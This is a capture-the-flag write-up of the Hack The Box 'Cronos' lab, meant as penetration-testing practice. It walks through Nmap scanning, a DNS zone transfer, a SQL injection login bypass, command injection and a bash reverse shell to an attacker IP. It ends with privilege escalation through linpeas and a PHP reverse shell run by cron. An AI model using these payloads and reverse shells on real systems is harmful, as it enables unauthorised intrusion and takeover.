Hack The Box (HTB) Writeup - Cronos

Today we will solve Cronos Box of Medium difficulty level from Hack The Box (HTB). If you are new, HTB is a practice online lab to learn penetration testing. This box is helpful in preparing for OSCP. certification.

Summary:

• Run Nmap to find open ports and services
• Enumerate DNS
• Add IP and identified hostnames in /etc/hosts
• Enumerate HTTP
• Identify login on admin.cronos.htb
• Use SQL Injection to bypass login
• Check for Command Injection
• Reverse the shell and locate user.txt flag
• Transfer Linux Privilege scripts from the local machine to low privileged machine
• Results
• php reverse shell in crontab
• Reverse shell and locate root.txt

Start with Nmap

Initial Scan

nmap 10.10.10.13

Run default scripts

nmap -sC -sV 10.10.10.13

Scan all ports

nmap -p- 10.10.10.13

Run UDP scan

nmap -sU 10.10.10.13

Using dig command to identify urls

dig axfr cronos.htb @10.10.10.13

Add urls in /etc/hosts by using nano /etc/hosts

Check admin.cronos.htb on browser

Try using SQL Injection Payloads from link, able to login successfully by using below payload

' or 1=1 limit 1 -- -+

Try command injection, use ls command. It confirms command injection vulnerability is available in web application.

Intercept request in Burpsuite and use command injection vulnerability to get a reverse shell.

bash -c 'bash -i /dev/tcp/10.10.14.16/8000 0>&1'

Got user.txt

Privilege escalation

Spawn a tty shell

python -c 'import pty; pty.spawn("/bin/sh")'

Run below commands to know the flavor of box

uname -a

cat /proc/version

cat /etc/issue

Identify Privilege Escalation script for Ubuntu 16.04.2. Click Here to download on local machine and then transfer it on compromised machine.

Run Privilege Escalation script

./linpeas.sh

Found /var/www/laravel/artisan on run of linpeas.sh script

Check crontab

Download php-reverse-shell.php script

Change local IP and port number

To catch a reverse shell, set nc and run php script

Got a reverse shell

Got root.